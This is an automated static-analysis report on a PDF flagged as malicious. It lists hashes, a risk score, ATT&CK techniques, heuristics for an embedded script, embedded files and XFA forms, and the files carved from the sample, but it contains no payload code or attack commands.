Malicious PDF — malware analysis report

Static analysis result for SHA-256 96b2a0ae1f703534…

MALICIOUS

PDF

35.8 KB
MD5: 0fdfbaed19ea838b3bba0a869e7d910b SHA-1: ec8cad6b9062946bf1f735c4dec335801a344b4e SHA-256: 96b2a0ae1f703534c2261ddc2ac27205ec74af467a8dbb00d8286e1687cca246
66 Risk Score

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter T1553 Subvert Trust Controls

The PDF file was flagged by an ML classifier as malicious with a very high probability. It contains embedded files and an embedded script payload, indicating an attempt to hide and execute malicious code. The XFA form structure is also present, which can sometimes be abused for exploitation. The exact nature of the script payload is not fully discernible from the provided excerpt, but its presence within an embedded object strongly suggests it is designed to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xci/1.0/
    • http://www.xfa.org/schema/xfa-template/2.5/
    • http://www.xfa.org/schema/xfa-data/1.0/

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0008.bin
0a2224c4023b216235b61c3fc4dd17bbfac1ab23a545687f51b97604cf654712		 pdf-embedded-file PDF EmbeddedFile object 8 at offset 0xC6 46 bytes
embedded_file_obj0009.bin
da6f875b44743569d80ece9274d5552cd72b9c791af7a325576360ec1b6218ee		 pdf-embedded-file PDF EmbeddedFile object 9 at offset 0x138 671 bytes
embedded_file_obj0010.bin
b03c3f0447baa63e9ea525da2000a20b77f4cbd001a976ac125c18bd97f4d07c		 pdf-embedded-file PDF EmbeddedFile object 10 at offset 0x41C 150 bytes
embedded_file_obj0011.bin
919311c4f3a5f8d631c55fffd296ccf550fdb5d7b4350edc85e72b711cfc5686		 pdf-embedded-file PDF EmbeddedFile object 11 at offset 0x4F7 437 bytes
embedded_file_obj0012.bin
072090be5ea6c4a216543a1d4332d27d322264f3038bbd986db2a09048143a1c		 pdf-embedded-file PDF EmbeddedFile object 12 at offset 0x6F1 181 bytes
embedded_file_obj0014.bin
b2c1c4cd9b67904c102bb26c2748cddabf1754c067ee3763df3e1940bb31691d		 pdf-embedded-file PDF EmbeddedFile object 14 at offset 0x7EC 33928 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.